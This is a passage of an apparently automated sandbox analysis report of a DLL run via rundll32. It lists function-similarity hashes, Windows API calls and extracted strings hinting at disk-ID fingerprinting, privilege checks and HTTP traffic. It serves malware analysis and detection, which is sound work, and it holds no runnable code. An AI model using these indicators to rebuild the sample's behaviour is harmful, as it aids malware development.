                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$memset$_time64htonlrandsrand
                                                                                                  • String ID:
                                                                                                  • API String ID: 2420628730-0
                                                                                                  • Opcode ID: bc717a641c4b40965a7539f697593fdcfd2d1c84f3e9c21b72f2d4563acd1e4c
                                                                                                  • Instruction ID: 78dc16aea02112adc5142b529c93f8ef24449392eecf0550c8dd20f0597382ad
                                                                                                  • Opcode Fuzzy Hash: bc717a641c4b40965a7539f697593fdcfd2d1c84f3e9c21b72f2d4563acd1e4c
                                                                                                  • Instruction Fuzzy Hash: C251893BA00B9089E702CF65A8413DD7BB8F309B9CF1A9149EF9517B49CB30C60AC360
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$freewcstol
                                                                                                  • String ID:
                                                                                                  • API String ID: 1017142431-0
                                                                                                  • Opcode ID: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
                                                                                                  • Instruction ID: ea2c5121f7eb01e98f314e31e7cc383447851c7166ff6db358424aa6cc9ed06f
                                                                                                  • Opcode Fuzzy Hash: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
                                                                                                  • Instruction Fuzzy Hash: C351683264478886EBA68F26A1403AE33E5F7597D8F008115FF9907798CF3ADA59CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$freewcstol
                                                                                                  • String ID:
                                                                                                  • API String ID: 1017142431-0
                                                                                                  • Opcode ID: 91753a2b24579f809c59a7839bbf57d4aaec203e4d39ef9f43d9a770c5dee1b2
                                                                                                  • Instruction ID: be79dc67c6c354923b804fe5f8ad9b59a21627c827f8274b8046453acc0eb7fe
                                                                                                  • Opcode Fuzzy Hash: 91753a2b24579f809c59a7839bbf57d4aaec203e4d39ef9f43d9a770c5dee1b2
                                                                                                  • Instruction Fuzzy Hash: 0C4160326047988AEBAA8F1AA0403EE73A5F7887D5F108115FF99477D9CF3AD655CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$freewcstol
                                                                                                  • String ID:
                                                                                                  • API String ID: 1017142431-0
                                                                                                  • Opcode ID: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
                                                                                                  • Instruction ID: b35714efefb3a3022de44867f37344a12698415f3c6fa059f944579b3902dd1a
                                                                                                  • Opcode Fuzzy Hash: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
                                                                                                  • Instruction Fuzzy Hash: AE415A7264478886EBB68F2594503EE37A1F7597E8F008115FF5807798CF3EDA5A8B00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1717984340-0
                                                                                                  • Opcode ID: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
                                                                                                  • Instruction ID: bae3b3959ef39ef5daeeababb2c60870945ab1ace41e6c98233782fb8fc2ea52
                                                                                                  • Opcode Fuzzy Hash: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
                                                                                                  • Instruction Fuzzy Hash: 9B31D272604B8482E764CF56B88074AB7A8F79DBD0F548628AFD947BA5CF38C645C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
                                                                                                    • Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B
                                                                                                    • Part of subcall function 000000018006A32C: CreateFileA.KERNEL32 ref: 000000018006A363
                                                                                                  • memset.MSVCRT ref: 000000018006C2AB
                                                                                                    • Part of subcall function 000000018006A2C8: DeviceIoControl.KERNEL32 ref: 000000018006A2F1
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000400,?,00000000,00002000,00000000,000000018006C06D), ref: 000000018006C308
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLastmallocmemmovememset
                                                                                                  • String ID: DISKID:$\\.\PhysicalDrive%d
                                                                                                  • API String ID: 1541746987-3765948602
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Delete
                                                                                                  • String ID:
                                                                                                  • API String ID: 1035893169-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CriticalInitializeSection$CountErrorLastSpinmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3637577767-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                                                  • String ID:
                                                                                                  • API String ID: 772211780-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                                                  • String ID:
                                                                                                  • API String ID: 772211780-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                                                  • String ID:
                                                                                                  • API String ID: 772211780-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CountTick$freemalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 112427268-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Initialize$DeleteEnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3345835275-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _errno_msizememsetrealloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1716158884-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _errno$memmovememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 390474681-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$DeleteEnterFreeLeaveLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 2347899730-0
                                                                                                  • Opcode ID: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
                                                                                                  • Instruction ID: 48e8189d87aa0b979fc36c7d6fe6748a55851d8ea4777fada0444d8c8a940578
                                                                                                  • Opcode Fuzzy Hash: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
                                                                                                  • Instruction Fuzzy Hash: 6E117033605B4897EB558F21E9443A97360FB4A7B5F1897249B690BAA0CF78D2798300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File_swprintf_c_l$PointerRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1259558433-0
                                                                                                  • Opcode ID: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
                                                                                                  • Instruction ID: 41788915f12d7117270c0c242483de8f49aba279d1603b6e07884f1d05f749b7
                                                                                                  • Opcode Fuzzy Hash: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
                                                                                                  • Instruction Fuzzy Hash: 9B01F53172864881F7929B61AC407DBA3A1F74D7C4F65C022FA5543A64CF3DC748CB20
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 2162964266-0
                                                                                                  • Opcode ID: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
                                                                                                  • Instruction ID: 461c31f9552aa3729a5e6565f135de1ccc8cc925f396947b96927f6322aea50e
                                                                                                  • Opcode Fuzzy Hash: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
                                                                                                  • Instruction Fuzzy Hash: A6014B72604B8486DA999F02B84439AA6A4F799FC0F58C034AF9A1BB1ACE7CC2518700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsncmp$FromListPath
                                                                                                  • String ID: http://$https://
                                                                                                  • API String ID: 1354619976-1916535328
                                                                                                  • Opcode ID: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
                                                                                                  • Instruction ID: 3b4f654c0190b1c660da69d9b707c9435e3e8476667423005c0f2b5f6a7ba28a
                                                                                                  • Opcode Fuzzy Hash: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
                                                                                                  • Instruction Fuzzy Hash: 21F06D30314B4D81FBD3AB22ED807E92361A74DBC0F08D026BE128B681EE29C79DC701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$BackslashModuleNameRemoveSpecmemmovememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1398880316-0
                                                                                                  • Opcode ID: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
                                                                                                  • Instruction ID: 22643bada24b11d976684183b583204a4ee84c872d42e87ba640a329a3643701
                                                                                                  • Opcode Fuzzy Hash: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
                                                                                                  • Instruction Fuzzy Hash: 14015E71214A8882EA60DB21F85539A6320F78A7A9F404221BAAD476E9DF3DC24DCB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __pctype_func
                                                                                                  • String ID: (null)$(null)
                                                                                                  • API String ID: 3630429742-1601437019
                                                                                                  • Opcode ID: 0065adc6453a10d9ccc5162ae3c07d97aa8578f8e3d986a6a80ec195f80303d0
                                                                                                  • Instruction ID: 4da43dc6e52408ab09b3749884352dd554f5e104f70e5d3a12e7d890f492f9a7
                                                                                                  • Opcode Fuzzy Hash: 0065adc6453a10d9ccc5162ae3c07d97aa8578f8e3d986a6a80ec195f80303d0
                                                                                                  • Instruction Fuzzy Hash: 0F81F07221068886FBEB8F2880523E967A1F749BD4F44D115FE4A57798DF3ECA89C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94
                                                                                                    • Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCriticalInitializeMultiSectionWide
                                                                                                  • String ID: Cache-Control: no-cache$Connection: Keep-Alive
                                                                                                  • API String ID: 2071930665-2797312137
                                                                                                  • Opcode ID: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
                                                                                                  • Instruction ID: 06b1c2be51b69464b9694ee66dce0eee22d8a6c444c0793ba53430c965e4d999
                                                                                                  • Opcode Fuzzy Hash: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
                                                                                                  • Instruction Fuzzy Hash: 6971B172300E9886EB96DF26D4807DD3760FB89BD8F86C625BE2947B85CF31D6598304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                  • String ID: map/set<T> too long
                                                                                                  • API String ID: 909987262-1285458680
                                                                                                  • Opcode ID: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
                                                                                                  • Instruction ID: b716ba77de4695a230c5cde56cb36caf30baef682964767987e615475274616d
                                                                                                  • Opcode Fuzzy Hash: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
                                                                                                  • Instruction Fuzzy Hash: 17419E32208F8881EAA2CF25E84039E73A4F399BE0F558225EF9D43B95DF39C556C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindNamePathwcscmp
                                                                                                  • String ID: RUNDLL32
                                                                                                  • API String ID: 3222201028-252960710
                                                                                                  • Opcode ID: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
                                                                                                  • Instruction ID: 4f5a5794d41fc096d520f70cd288b3f3e4e93d0d03317b7f7fc332b0f1d573f2
                                                                                                  • Opcode Fuzzy Hash: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
                                                                                                  • Instruction Fuzzy Hash: 87412932711A5896EB919F39C84479C2360FB49BB8F548312EA3D47BE9DF34CA99C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpswprintf
                                                                                                  • String ID: %X%X%X%X
                                                                                                  • API String ID: 6652212-3817614625
                                                                                                  • Opcode ID: 5a4a0ef71a518b7b1e42a9ee04a4acde75a59ea632b103e90386aeff25023f9c
                                                                                                  • Instruction ID: 5baa55fa5f1c5327c79efc128b9da1770f88ddfa4c7447b56b890561a4175455
                                                                                                  • Opcode Fuzzy Hash: 5a4a0ef71a518b7b1e42a9ee04a4acde75a59ea632b103e90386aeff25023f9c
                                                                                                  • Instruction Fuzzy Hash: 2C3129B36166C446FBA39FA4A4013ED7BA0E7197C4F48C126F6C647696DA2FC64AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000018000C25C), ref: 000000018000D7AF
                                                                                                  • _wtoi64.MSVCRT ref: 000000018000D7B8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Time$FileHeapProcessSystem_wtoi64
                                                                                                  • String ID: __LastModified__
                                                                                                  • API String ID: 76029450-3092259212
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandHeapProcessStringsmemset
                                                                                                  • String ID: %userprofile%
                                                                                                  • API String ID: 513494641-4287493773
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ShellExecuteW.SHELL32 ref: 000000018004AF73
                                                                                                    • Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
                                                                                                    • Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
                                                                                                    • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
                                                                                                    • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
                                                                                                    • Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
                                                                                                    • Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
                                                                                                    • Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
                                                                                                    • Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
                                                                                                    • Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
                                                                                                    • Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B
                                                                                                    • Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA
                                                                                                  • memset.MSVCRT ref: 000000018004AF8E
                                                                                                  Strings
                                                                                                  Memory Dump Source
